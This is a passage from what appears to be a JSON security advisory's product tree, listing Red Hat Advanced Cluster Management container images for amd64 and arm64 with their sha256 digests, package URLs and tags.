"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:cb76c81b895dfb5bc384407baf76c5c74d9b509342e665f3d5ff234a40f16236_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:cb76c81b895dfb5bc384407baf76c5c74d9b509342e665f3d5ff234a40f16236_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:cb76c81b895dfb5bc384407baf76c5c74d9b509342e665f3d5ff234a40f16236_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-grafana-rhel9@sha256%3Acb76c81b895dfb5bc384407baf76c5c74d9b509342e665f3d5ff234a40f16236?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774950654"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:db8ed91f54d683d9d3be3b0747f7429eb95accc8802593dd61d8c24e8a1facfb_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:db8ed91f54d683d9d3be3b0747f7429eb95accc8802593dd61d8c24e8a1facfb_amd64",
"product_id": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:db8ed91f54d683d9d3be3b0747f7429eb95accc8802593dd61d8c24e8a1facfb_amd64",
"product_identification_helper": {
"purl": "pkg:oci/grafana-dashboard-loader-rhel9@sha256%3Adb8ed91f54d683d9d3be3b0747f7429eb95accc8802593dd61d8c24e8a1facfb?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915373"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:701bc2dd0a441216ea138b677dbf71d497d9b7acaad5f48661117008a8e5defe_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:701bc2dd0a441216ea138b677dbf71d497d9b7acaad5f48661117008a8e5defe_amd64",
"product_id": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:701bc2dd0a441216ea138b677dbf71d497d9b7acaad5f48661117008a8e5defe_amd64",
"product_identification_helper": {
"purl": "pkg:oci/insights-client-rhel9@sha256%3A701bc2dd0a441216ea138b677dbf71d497d9b7acaad5f48661117008a8e5defe?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915432"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:736631a4d89bf44078b7f180ddcd474655d66ed43b85a4a79258eab9348656ff_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:736631a4d89bf44078b7f180ddcd474655d66ed43b85a4a79258eab9348656ff_amd64",
"product_id": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:736631a4d89bf44078b7f180ddcd474655d66ed43b85a4a79258eab9348656ff_amd64",
"product_identification_helper": {
"purl": "pkg:oci/insights-metrics-rhel9@sha256%3A736631a4d89bf44078b7f180ddcd474655d66ed43b85a4a79258eab9348656ff?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915327"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:60a3e7e83d189003d185e2415f96b4f3be0912e4cbaa96ea4ed8ebcdce5cc1d0_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:60a3e7e83d189003d185e2415f96b4f3be0912e4cbaa96ea4ed8ebcdce5cc1d0_amd64",
"product_id": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:60a3e7e83d189003d185e2415f96b4f3be0912e4cbaa96ea4ed8ebcdce5cc1d0_amd64",
"product_identification_helper": {
"purl": "pkg:oci/klusterlet-addon-controller-rhel9@sha256%3A60a3e7e83d189003d185e2415f96b4f3be0912e4cbaa96ea4ed8ebcdce5cc1d0?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915355"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:0a98f4d3e54b7410bfc1601f2ee2ba1308f30e40314bfc5169c3d99c3b8dfaa1_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:0a98f4d3e54b7410bfc1601f2ee2ba1308f30e40314bfc5169c3d99c3b8dfaa1_amd64",
"product_id": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:0a98f4d3e54b7410bfc1601f2ee2ba1308f30e40314bfc5169c3d99c3b8dfaa1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kube-rbac-proxy-rhel9@sha256%3A0a98f4d3e54b7410bfc1601f2ee2ba1308f30e40314bfc5169c3d99c3b8dfaa1?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775630574"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:c2bfb459d7442878d591cc31436830b983fe30dcfa6f7d383cc91cb32e42fa7c_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:c2bfb459d7442878d591cc31436830b983fe30dcfa6f7d383cc91cb32e42fa7c_amd64",
"product_id": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:c2bfb459d7442878d591cc31436830b983fe30dcfa6f7d383cc91cb32e42fa7c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kube-state-metrics-rhel9@sha256%3Ac2bfb459d7442878d591cc31436830b983fe30dcfa6f7d383cc91cb32e42fa7c?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915418"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:c7bfe530a7efe66f5c3e2e08b114b3b9e44072e3609725663d6a5f3945bda512_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:c7bfe530a7efe66f5c3e2e08b114b3b9e44072e3609725663d6a5f3945bda512_amd64",
"product_id": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:c7bfe530a7efe66f5c3e2e08b114b3b9e44072e3609725663d6a5f3945bda512_amd64",
"product_identification_helper": {
"purl": "pkg:oci/memcached-exporter-rhel9@sha256%3Ac7bfe530a7efe66f5c3e2e08b114b3b9e44072e3609725663d6a5f3945bda512?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775466899"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:7fa35da009ab6e41177f0589f6d3fbf1bbe3fff4b52add3bfbc516a046e35640_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:7fa35da009ab6e41177f0589f6d3fbf1bbe3fff4b52add3bfbc516a046e35640_amd64",
"product_id": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:7fa35da009ab6e41177f0589f6d3fbf1bbe3fff4b52add3bfbc516a046e35640_amd64",
"product_identification_helper": {
"purl": "pkg:oci/metrics-collector-rhel9@sha256%3A7fa35da009ab6e41177f0589f6d3fbf1bbe3fff4b52add3bfbc516a046e35640?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915508"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:40f8ad6430cc767b56992722d5890f98882c7372950320d28e808c18714b7179_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:40f8ad6430cc767b56992722d5890f98882c7372950320d28e808c18714b7179_amd64",
"product_id": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:40f8ad6430cc767b56992722d5890f98882c7372950320d28e808c18714b7179_amd64",
"product_identification_helper": {
"purl": "pkg:oci/multicloud-integrations-rhel9@sha256%3A40f8ad6430cc767b56992722d5890f98882c7372950320d28e808c18714b7179?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775326442"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:a0928fa238b82f2c00778064d0f1e52ff507ffef7a0a3756b1f2f2022d375e4b_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:a0928fa238b82f2c00778064d0f1e52ff507ffef7a0a3756b1f2f2022d375e4b_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:a0928fa238b82f2c00778064d0f1e52ff507ffef7a0a3756b1f2f2022d375e4b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-multicluster-observability-addon-rhel9@sha256%3Aa0928fa238b82f2c00778064d0f1e52ff507ffef7a0a3756b1f2f2022d375e4b?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915504"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:25fb42a78847235c61e35f66a6e02dfee5fc0b6832aa4ce06c3c6f395b95b36d_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:25fb42a78847235c61e35f66a6e02dfee5fc0b6832aa4ce06c3c6f395b95b36d_amd64",
"product_id": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:25fb42a78847235c61e35f66a6e02dfee5fc0b6832aa4ce06c3c6f395b95b36d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-observability-rhel9-operator@sha256%3A25fb42a78847235c61e35f66a6e02dfee5fc0b6832aa4ce06c3c6f395b95b36d?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915540"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:450199903a5d88d10b107768839780fbd0ee15535c6a998a0cac5bec942dd414_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:450199903a5d88d10b107768839780fbd0ee15535c6a998a0cac5bec942dd414_amd64",
"product_id": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:450199903a5d88d10b107768839780fbd0ee15535c6a998a0cac5bec942dd414_amd64",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-application-rhel9@sha256%3A450199903a5d88d10b107768839780fbd0ee15535c6a998a0cac5bec942dd414?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915538"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:e9cab985b52c8f23b62cad3ea9c692e321a5347bd06fc56b19dfdb1801030567_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:e9cab985b52c8f23b62cad3ea9c692e321a5347bd06fc56b19dfdb1801030567_amd64",
"product_id": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:e9cab985b52c8f23b62cad3ea9c692e321a5347bd06fc56b19dfdb1801030567_amd64",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-channel-rhel9@sha256%3Ae9cab985b52c8f23b62cad3ea9c692e321a5347bd06fc56b19dfdb1801030567?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775585006"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:0e4525617200428a5510108b0a0845fde43fd4e64804186af045df9680ca05b7_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:0e4525617200428a5510108b0a0845fde43fd4e64804186af045df9680ca05b7_amd64",
"product_id": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:0e4525617200428a5510108b0a0845fde43fd4e64804186af045df9680ca05b7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-subscription-rhel9@sha256%3A0e4525617200428a5510108b0a0845fde43fd4e64804186af045df9680ca05b7?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775176904"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:c920a77dcf02347d116035d5cfef1a365e02022713788a14045a9be2a1bd1c5c_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:c920a77dcf02347d116035d5cfef1a365e02022713788a14045a9be2a1bd1c5c_amd64",
"product_id": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:c920a77dcf02347d116035d5cfef1a365e02022713788a14045a9be2a1bd1c5c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/multiclusterhub-rhel9@sha256%3Ac920a77dcf02347d116035d5cfef1a365e02022713788a14045a9be2a1bd1c5c?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915533"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:2adb87f4433d9516e2111150bccafbbb8dec179bdf3fe3acd38d7b27411cb666_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:2adb87f4433d9516e2111150bccafbbb8dec179bdf3fe3acd38d7b27411cb666_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:2adb87f4433d9516e2111150bccafbbb8dec179bdf3fe3acd38d7b27411cb666_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-must-gather-rhel9@sha256%3A2adb87f4433d9516e2111150bccafbbb8dec179bdf3fe3acd38d7b27411cb666?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775077876"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5b7668d6f3b7fb994c4bbbb86bdb92d4258b88ab92337394b66058255c048ad8_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5b7668d6f3b7fb994c4bbbb86bdb92d4258b88ab92337394b66058255c048ad8_amd64",
"product_id": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5b7668d6f3b7fb994c4bbbb86bdb92d4258b88ab92337394b66058255c048ad8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/node-exporter-rhel9@sha256%3A5b7668d6f3b7fb994c4bbbb86bdb92d4258b88ab92337394b66058255c048ad8?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915524"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8c986374ff8afd980f450877facc2927fdd6f655f3d6b7def6771485d00afeb1_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8c986374ff8afd980f450877facc2927fdd6f655f3d6b7def6771485d00afeb1_amd64",
"product_id": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8c986374ff8afd980f450877facc2927fdd6f655f3d6b7def6771485d00afeb1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/observatorium-rhel9@sha256%3A8c986374ff8afd980f450877facc2927fdd6f655f3d6b7def6771485d00afeb1?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915522"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5ac47e52a78f31b8982de5b9144ec96baab80c78ba8d06d3efabda329e017d36_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5ac47e52a78f31b8982de5b9144ec96baab80c78ba8d06d3efabda329e017d36_amd64",
"product_id": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5ac47e52a78f31b8982de5b9144ec96baab80c78ba8d06d3efabda329e017d36_amd64",
"product_identification_helper": {
"purl": "pkg:oci/observatorium-rhel9-operator@sha256%3A5ac47e52a78f31b8982de5b9144ec96baab80c78ba8d06d3efabda329e017d36?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775281134"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:111bbc8fda153d16c384a622dd659c53b8cdc47e495a9fada411a5042954ab6e_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:111bbc8fda153d16c384a622dd659c53b8cdc47e495a9fada411a5042954ab6e_amd64",
"product_id": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:111bbc8fda153d16c384a622dd659c53b8cdc47e495a9fada411a5042954ab6e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/prometheus-rhel9@sha256%3A111bbc8fda153d16c384a622dd659c53b8cdc47e495a9fada411a5042954ab6e?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915610"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:1d7f37fa0146f48291fd1dd12752d0a19c8e87c30e1698492b36274c79051a9e_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:1d7f37fa0146f48291fd1dd12752d0a19c8e87c30e1698492b36274c79051a9e_amd64",
"product_id": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:1d7f37fa0146f48291fd1dd12752d0a19c8e87c30e1698492b36274c79051a9e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/prometheus-alertmanager-rhel9@sha256%3A1d7f37fa0146f48291fd1dd12752d0a19c8e87c30e1698492b36274c79051a9e?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915598"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:db8b5776a9dcb4b87a4de948c4c11d0164e66df188f97be6a6fd7e9953f5501e_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:db8b5776a9dcb4b87a4de948c4c11d0164e66df188f97be6a6fd7e9953f5501e_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:db8b5776a9dcb4b87a4de948c4c11d0164e66df188f97be6a6fd7e9953f5501e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-prometheus-config-reloader-rhel9@sha256%3Adb8b5776a9dcb4b87a4de948c4c11d0164e66df188f97be6a6fd7e9953f5501e?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915573"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:87f2e1ee942b226835c97b7abe43a62802146755141a850137b9ab03dd6fccf6_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:87f2e1ee942b226835c97b7abe43a62802146755141a850137b9ab03dd6fccf6_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:87f2e1ee942b226835c97b7abe43a62802146755141a850137b9ab03dd6fccf6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-prometheus-rhel9@sha256%3A87f2e1ee942b226835c97b7abe43a62802146755141a850137b9ab03dd6fccf6?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915621"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:58a8acff99aaaacdb7c292b615c2ed9a0418d82f75273c1809a6db05811713fa_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:58a8acff99aaaacdb7c292b615c2ed9a0418d82f75273c1809a6db05811713fa_amd64",
"product_id": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:58a8acff99aaaacdb7c292b615c2ed9a0418d82f75273c1809a6db05811713fa_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rbac-query-proxy-rhel9@sha256%3A58a8acff99aaaacdb7c292b615c2ed9a0418d82f75273c1809a6db05811713fa?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915649"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:3074a430dd8bbb0399ce649186cb6140d8525e5b7c1e05b79a4ab74a32d989b8_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:3074a430dd8bbb0399ce649186cb6140d8525e5b7c1e05b79a4ab74a32d989b8_amd64",
"product_id": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:3074a430dd8bbb0399ce649186cb6140d8525e5b7c1e05b79a4ab74a32d989b8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/search-collector-rhel9@sha256%3A3074a430dd8bbb0399ce649186cb6140d8525e5b7c1e05b79a4ab74a32d989b8?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775566178"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:2b6a43ae23126321b9c94b37da646db4943331200434edc6a54be156150065f2_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:2b6a43ae23126321b9c94b37da646db4943331200434edc6a54be156150065f2_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:2b6a43ae23126321b9c94b37da646db4943331200434edc6a54be156150065f2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-indexer-rhel9@sha256%3A2b6a43ae23126321b9c94b37da646db4943331200434edc6a54be156150065f2?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915641"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:5a98450b5f85a75172ca51e2dcf096465635dc2e4c5fedfd74e1fdd665f3fa65_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:5a98450b5f85a75172ca51e2dcf096465635dc2e4c5fedfd74e1fdd665f3fa65_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:5a98450b5f85a75172ca51e2dcf096465635dc2e4c5fedfd74e1fdd665f3fa65_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-v2-api-rhel9@sha256%3A5a98450b5f85a75172ca51e2dcf096465635dc2e4c5fedfd74e1fdd665f3fa65?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915647"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:f3b200f2a00217299f66cab9f89de8673003d194292b41157f663799b5c61c3e_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:f3b200f2a00217299f66cab9f89de8673003d194292b41157f663799b5c61c3e_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:f3b200f2a00217299f66cab9f89de8673003d194292b41157f663799b5c61c3e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-v2-rhel9@sha256%3Af3b200f2a00217299f66cab9f89de8673003d194292b41157f663799b5c61c3e?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915649"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:02486920d371f14bcbafc720545c4a6f24523a46483e60c00c7f25f52b3ea476_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:02486920d371f14bcbafc720545c4a6f24523a46483e60c00c7f25f52b3ea476_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:02486920d371f14bcbafc720545c4a6f24523a46483e60c00c7f25f52b3ea476_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-siteconfig-rhel9@sha256%3A02486920d371f14bcbafc720545c4a6f24523a46483e60c00c7f25f52b3ea476?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775657510"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:82914e82513e2f8522589886a5df6681d12c6442ff1b8ef05a21d31c09fa0f0d_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:82914e82513e2f8522589886a5df6681d12c6442ff1b8ef05a21d31c09fa0f0d_amd64",
"product_id": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:82914e82513e2f8522589886a5df6681d12c6442ff1b8ef05a21d31c09fa0f0d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/submariner-addon-rhel9@sha256%3A82914e82513e2f8522589886a5df6681d12c6442ff1b8ef05a21d31c09fa0f0d?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915751"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:6a88ce891e0fc9619e983a5b63fef86f735b8df5eb56909075bd3bbb098dddf8_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:6a88ce891e0fc9619e983a5b63fef86f735b8df5eb56909075bd3bbb098dddf8_amd64",
"product_id": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:6a88ce891e0fc9619e983a5b63fef86f735b8df5eb56909075bd3bbb098dddf8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/thanos-rhel9@sha256%3A6a88ce891e0fc9619e983a5b63fef86f735b8df5eb56909075bd3bbb098dddf8?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915751"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:ebff3dd368f33d1aec215b947b88f4aa7e821db1577d448b8c6eb4e6ead7fe07_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:ebff3dd368f33d1aec215b947b88f4aa7e821db1577d448b8c6eb4e6ead7fe07_amd64",
"product_id": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:ebff3dd368f33d1aec215b947b88f4aa7e821db1577d448b8c6eb4e6ead7fe07_amd64",
"product_identification_helper": {
"purl": "pkg:oci/thanos-receive-controller-rhel9@sha256%3Aebff3dd368f33d1aec215b947b88f4aa7e821db1577d448b8c6eb4e6ead7fe07?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915823"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:4e6dd9d24ab247b2a7b84f7842b2a710eee3aa2fce58fc1516ef5bb55e0693f0_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:4e6dd9d24ab247b2a7b84f7842b2a710eee3aa2fce58fc1516ef5bb55e0693f0_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:4e6dd9d24ab247b2a7b84f7842b2a710eee3aa2fce58fc1516ef5bb55e0693f0_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-volsync-addon-controller-rhel9@sha256%3A4e6dd9d24ab247b2a7b84f7842b2a710eee3aa2fce58fc1516ef5bb55e0693f0?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774984227"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7328602aa637f1b555ecd56c05d6ade8dbee48fae78a0118b1e39774b8383704_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7328602aa637f1b555ecd56c05d6ade8dbee48fae78a0118b1e39774b8383704_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7328602aa637f1b555ecd56c05d6ade8dbee48fae78a0118b1e39774b8383704_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-cli-rhel9@sha256%3A7328602aa637f1b555ecd56c05d6ade8dbee48fae78a0118b1e39774b8383704?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915148"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:2bc6310bd61774d74b1dd0245139b3bfc4940efb1bf424ad0e7a4d822f2271b8_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:2bc6310bd61774d74b1dd0245139b3bfc4940efb1bf424ad0e7a4d822f2271b8_arm64",
"product_id": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:2bc6310bd61774d74b1dd0245139b3bfc4940efb1bf424ad0e7a4d822f2271b8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cert-policy-controller-rhel9@sha256%3A2bc6310bd61774d74b1dd0245139b3bfc4940efb1bf424ad0e7a4d822f2271b8?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915173"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:58a418395bf71e339145d259b6906172fbc066e17e05071ce983c5615e703075_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:58a418395bf71e339145d259b6906172fbc066e17e05071ce983c5615e703075_arm64",
"product_id": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:58a418395bf71e339145d259b6906172fbc066e17e05071ce983c5615e703075_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-backup-rhel9-operator@sha256%3A58a418395bf71e339145d259b6906172fbc066e17e05071ce983c5615e703075?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915147"
}
}
},
{
